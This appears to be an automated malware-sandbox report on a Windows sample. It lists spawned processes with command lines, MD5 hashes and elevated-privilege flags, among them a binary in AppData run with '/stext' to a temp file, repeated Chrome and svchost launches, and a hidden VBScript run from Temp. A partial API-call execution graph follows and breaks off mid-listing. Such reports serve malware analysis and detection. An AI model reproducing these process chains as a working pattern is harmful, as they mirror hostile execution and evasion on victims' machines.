                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                                                                                                                                                                                                                                          Imagebase:0x1c0000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                          Start time:18:02:39
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                                                                                                                                                                                                                                          Imagebase:0xb70000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                          Start time:18:02:40
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                          Start time:18:02:40
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1896,i,8025100827868505226,8846340673771724363,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                          Start time:18:02:41
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                          Start time:18:02:43
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\drivers\mstee.sys
                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                          Commandline:
                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                          File size:12'288 bytes
                                                                                                                                                                                                                                          MD5 hash:244C73253E165582DDC43AF4467D23DF
                                                                                                                                                                                                                                          Has elevated privileges:
                                                                                                                                                                                                                                          Has administrator privileges:
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                          Start time:18:02:43
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\drivers\mskssrv.sys
                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                          Commandline:
                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                          File size:34'816 bytes
                                                                                                                                                                                                                                          MD5 hash:26854C1F5500455757BC00365CEF9483
                                                                                                                                                                                                                                          Has elevated privileges:
                                                                                                                                                                                                                                          Has administrator privileges:
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                          Start time:18:02:46
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                          Start time:18:02:47
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,14003735333465884459,4249736709750483152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                          Start time:18:02:51
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                          Start time:18:02:51
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,9861328130371480487,5472941936562496665,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                          Start time:18:02:51
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                          Start time:18:02:54
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                          Start time:18:02:55
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1980,i,14451717029141036046,9817444519185968189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:54
                                                                                                                                                                                                                                          Start time:18:02:58
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:55
                                                                                                                                                                                                                                          Start time:18:02:59
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1980,i,13194812879482372137,17589311234174251836,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:56
                                                                                                                                                                                                                                          Start time:18:02:59
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:57
                                                                                                                                                                                                                                          Start time:18:03:04
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:58
                                                                                                                                                                                                                                          Start time:18:03:04
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,4041789208375361090,5104077722080206453,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:59
                                                                                                                                                                                                                                          Start time:18:03:07
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:60
                                                                                                                                                                                                                                          Start time:18:03:07
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1900,i,964775095578921725,9120990377794690672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:61
                                                                                                                                                                                                                                          Start time:18:03:07
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:62
                                                                                                                                                                                                                                          Start time:18:03:09
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
                                                                                                                                                                                                                                          Imagebase:0x2b0000
                                                                                                                                                                                                                                          File size:147'456 bytes
                                                                                                                                                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:8.9%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:17.8%
                                                                                                                                                                                                                                            Total number of Nodes:101
                                                                                                                                                                                                                                            Total number of Limit Nodes:15
                                                                                                                                                                                                                                            execution_graph 51501 132bfe0 51502 132c022 51501->51502 51503 132c028 GetModuleHandleW 51501->51503 51502->51503 51504 132c055 51503->51504 51558 132e080 51559 132e0c6 GetCurrentProcess 51558->51559 51561 132e111 51559->51561 51562 132e118 GetCurrentThread 51559->51562 51561->51562 51563 132e155 GetCurrentProcess 51562->51563 51564 132e14e 51562->51564 51565 132e18b GetCurrentThreadId 51563->51565 51564->51563 51567 132e1e4 51565->51567 51568 5526ca0 51570 5526cc1 51568->51570 51569 5526cd9 51570->51569 51573 5527837 51570->51573 51571 5526dec 51574 5527847 51573->51574 51575 552789b DrawTextExW 51573->51575 51574->51571 51577 5527926 51575->51577 51577->51571 51461 7991c50 51462 7991c65 51461->51462 51464 7991d1f 51462->51464 51467 552e0ea 51462->51467 51476 552e0f8 51462->51476 51463 7991cf4 51468 552e123 51467->51468 51469 552e11c 51467->51469 51475 552e14a 51468->51475 51485 552ab8c 51468->51485 51469->51463 51472 552ab8c GetCurrentThreadId 51472->51475 51473 552e176 51473->51463 51475->51473 51489 552e433 GetCurrentThreadId 51475->51489 51477 552e123 51476->51477 51478 552e11c 51476->51478 51479 552ab8c GetCurrentThreadId 51477->51479 51484 552e14a 51477->51484 51478->51463 51480 552e140 51479->51480 51481 552ab8c GetCurrentThreadId 51480->51481 51481->51484 51482 552e176 51482->51463 51484->51482 51490 552e433 GetCurrentThreadId 51484->51490 51486 552ab97 51485->51486 51487 552e140 51486->51487 51488 552e45f GetCurrentThreadId 51486->51488 51487->51472 51488->51487 51489->51475 51490->51484 51505 79929c0 51506 7992957 51505->51506 51514 79929c6 51505->51514 51507 799298e 51506->51507 51508 79929a3 51506->51508 51517 7991f1c 51507->51517 51510 7991f1c 3 API calls 51508->51510 51512 79929b2 51510->51512 51513 7992e55 51514->51513 51522 79932e7 51514->51522 51528 79932f8 51514->51528 51518 7991f27 51517->51518 51519 7992999 51518->51519 51520 79932f8 2 API calls 51518->51520 51521 79932e7 2 API calls 51518->51521 51520->51519 51521->51519 51523 7993312 51522->51523 51534 7991f64 51522->51534 51525 799331f 51523->51525 51526 7993348 CreateIconFromResourceEx 51523->51526 51525->51513 51527 79933c6 51526->51527 51527->51513 51529 7991f64 CreateIconFromResourceEx 51528->51529 51530 7993312 51529->51530 51531 799331f 51530->51531 51532 7993348 CreateIconFromResourceEx 51530->51532 51531->51513 51533 79933c6 51532->51533 51533->51513 51535 7993348 CreateIconFromResourceEx 51534->51535 51536 79933c6 51535->51536 51536->51523 51491 5524918 51492 5524971 51491->51492 51495 55249d8 51492->51495 51493 55249aa 51497 55249dd 51495->51497 51496 55249e3 51496->51493 51497->51496 51500 5524380 GetSystemMetrics GetSystemMetrics 51497->51500 51499 5524a88 51499->51493 51500->51499 51537 1324668 51538 132467a 51537->51538 51539 1324686 51538->51539 51541 1324778 51538->51541 51542 132477c 51541->51542 51546 1324878 51542->51546 51550 1324888 51542->51550 51548 132487c 51546->51548 51547 132498c 51547->51547 51548->51547 51554 132449c 51548->51554 51551 13248af 51550->51551 51552 132498c 51551->51552 51553 132449c CreateActCtxA 51551->51553 51553->51552 51555 1325918 CreateActCtxA 51554->51555 51557 13259db 51555->51557 51578 5528728 51579 5528767 51578->51579 51580 5528e78 51579->51580 51581 552e0ea 2 API calls 51579->51581 51582 552e0f8 2 API calls 51579->51582 51581->51580 51582->51580 51583 132e2c8 DuplicateHandle 51584 132e35e 51583->51584

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 07991F1C Relevance: 6.9, Strings: 5, Instructions: 621COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 322 7991f1c-79929f8 325 7992edb-7992f44 322->325 326 79929fe-7992a03 322->326 332 7992f4b-7992fd3 325->332 326->325 327 7992a09-7992a26 326->327 327->332 333 7992a2c-7992a30 327->333 377 7992fde-799305e 332->377 335 7992a3f-7992a43 333->335 336 7992a32-7992a3c call 7991f2c 333->336 339 7992a52-7992a59 335->339 340 7992a45-7992a4f call 7991f2c 335->340 336->335 344 7992a5f-7992a8f 339->344 345 7992b74-7992b79 339->345 340->339 356 799325e-7993284 344->356 359 7992a95-7992b68 call 7991f38 * 2 344->359 348 7992b7b-7992b7f 345->348 349 7992b81-7992b86 345->349 348->349 351 7992b88-7992b8c 348->351 352 7992b98-7992bc8 call 7991f44 * 3 349->352 351->356 357 7992b92-7992b95 351->357 352->377 378 7992bce-7992bd1 352->378 366 7993294 356->366 367 7993286-7993292 356->367 357->352 359->345 386 7992b6a 359->386 370 7993297-799329c 366->370 367->370 394 7993065-79930e7 377->394 378->377 381 7992bd7-7992bd9 378->381 381->377 383 7992bdf-7992c14 381->383 393 7992c1a-7992c23 383->393 383->394 386->345 396 7992c29-7992c83 call 7991f44 * 2 call 7991f54 * 2 393->396 397 7992d86-7992d8a 393->397 399 79930ef-7993171 394->399 439 7992c95 396->439 440 7992c85-7992c8e 396->440 397->399 400 7992d90-7992d94 397->400 403 7993179-79931a6 399->403 400->403 404 7992d9a-7992da0 400->404 418 79931ad-799322d 403->418 409 7992da2 404->409 410 7992da4-7992dd9 404->410 414 7992de0-7992de6 409->414 410->414 414->418 419 7992dec-7992df4 414->419 474 7993234-7993256 418->474 422 7992dfb-7992dfd 419->422 423 7992df6-7992dfa 419->423 430 7992e5f-7992e65 422->430 431 7992dff-7992e23 422->431 423->422 435 7992e84-7992eb2 430->435 436 7992e67-7992e82 430->436 458 7992e2c-7992e30 431->458 459 7992e25-7992e2a 431->459 456 7992eba-7992ec6 435->456 436->456 446 7992c99-7992c9b 439->446 440->446 447 7992c90-7992c93 440->447 454 7992c9d 446->454 455 7992ca2-7992ca6 446->455 447->446 454->455 460 7992ca8-7992caf 455->460 461 7992cb4-7992cba 455->461 473 7992ecc-7992ed8 456->473 456->474 458->356 465 7992e36-7992e39 458->465 464 7992e3c-7992e4d 459->464 469 7992d51-7992d55 460->469 470 7992cbc-7992cc2 461->470 471 7992cc4-7992cc9 461->471 511 7992e4f call 79932f8 464->511 512 7992e4f call 79932e7 464->512 465->464 475 7992d74-7992d80 469->475 476 7992d57-7992d71 469->476 477 7992ccf-7992cd5 470->477 471->477 474->356 475->396 475->397 476->475 480 7992cdb-7992ce0 477->480 481 7992cd7-7992cd9 477->481 486 7992ce2-7992cf4 480->486 481->486 483 7992e55-7992e5d 483->456 491 7992cfe-7992d03 486->491 492 7992cf6-7992cfc 486->492 494 7992d09-7992d10 491->494 492->494 499 7992d12-7992d14 494->499 500 7992d16 494->500 502 7992d1b-7992d26 499->502 500->502 503 7992d28-7992d2b 502->503 504 7992d4a 502->504 503->469 506 7992d2d-7992d33 503->506 504->469 507 7992d3a-7992d43 506->507 508 7992d35-7992d38 506->508 507->469 510 